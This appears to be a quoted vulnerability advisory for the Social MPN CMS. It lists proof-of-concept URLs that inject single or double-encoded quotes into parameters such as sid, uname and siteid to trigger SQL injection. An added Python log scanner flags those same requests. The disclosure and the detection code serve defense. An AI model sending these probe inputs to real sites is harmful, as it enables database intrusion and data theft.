QUOTE
Program: Social MPN
Homepage: http://www.socialmpn.com
Vulnerable Versions: all
Risk: high
Impact: SQL injection and full path disclosure. An attacker may execute
arbitrary SQL statements on the vulnerable system.
This may compromise the integrity of your database and expose
sensitive information.
- Description
Social MPN is a CMS similar to myPHPNuke. The biggest change to the
system in SocialMPN is the multi-site functionality we have
incorporated into the package. This allows you to run multiple
websites from one install of SocialMPN.
This can range from completely separate domains (i.e. Ruffdogs.com,
vsadesign.com), to an all-inclusive site with user-owned sections, or
sites based on sub-domains: guilinux.com, mandrake.guilinux.com,
fedora.guilinux.com (wildcards must be enabled on the server for
this).
POC:
Tested with these query variables:
http://xxx.xxx.xxx.xxx/article.php?sid=%27
http://xxx.xxx.xxx.xxx/user.php?uname='&pass=1&op=login
http://xxx.xxx.xxx.xxx/viewforum.php?forum=43&siteid=%2527
http://xxx.xxx.xxx.xxx/newtopic.php?username='&password=
http://xxx.xxx.xxx.xxx/sections.php?op=lis...icles&secid=%27
http://xxx.xxx.xxx.xxx/sections.php?op=lis...les&artid=%2527
http://xxx.xxx.xxx.xxx/index.php?siteid=...ow&aftersid=380
http://xxx.xxx.xxx.xxx/friend.php?sid=%252...=1&op=SendStory
- Credits
-------------------------------------------------
Discovered by LINUX <admin@sosvulnerable.net> http://www.sosvulnerable.net/
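Added example (not part of the original advisory): a log check that flags requests carrying a single quote in the parameters the test URLs above target, including the double-encoded `%2527` form. The access-log format, the sample lines and the three-round decode limit are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Parameter names taken from the advisory's test URLs.
WATCHED = {"sid", "uname", "siteid", "username", "secid", "artid"}
MAX_ROUNDS = 3  # assumption: decode at most three layers (%2527 needs two)

def fully_decode(value):
    """Percent-decode repeatedly until stable; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def suspicious_params(url):
    """Return [(name, decoded, rounds)] for watched params holding a quote."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        if name not in WATCHED:
            continue
        decoded, rounds = fully_decode(raw)
        if "'" in decoded:
            hits.append((name, decoded, rounds))
    return hits

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan(log_lines):
    """Return [(line_number, hits)] for log lines with flagged parameters."""
    found = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        hits = suspicious_params(m.group(1)) if m else []
        if hits:
            found.append((n, hits))
    return found

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /article.php?sid=380 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2005:10:00:05 +0000] "GET /article.php?sid=%27 HTTP/1.1" 200 912',
    '192.0.2.77 - - [01/Jan/2005:10:00:06 +0000] "GET /viewforum.php?forum=43&siteid=%2527 HTTP/1.1" 200 880',
    '192.0.2.77 - - [01/Jan/2005:10:00:07 +0000] "GET /user.php?uname=\'&pass=1&op=login HTTP/1.1" 200 734',
]
```

The `rounds` value separates a plain `%27` (1) from the double-encoded `%2527` (2); a quote in `uname` or `username` can also come from a legitimate name, so treat those hits as leads to review.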




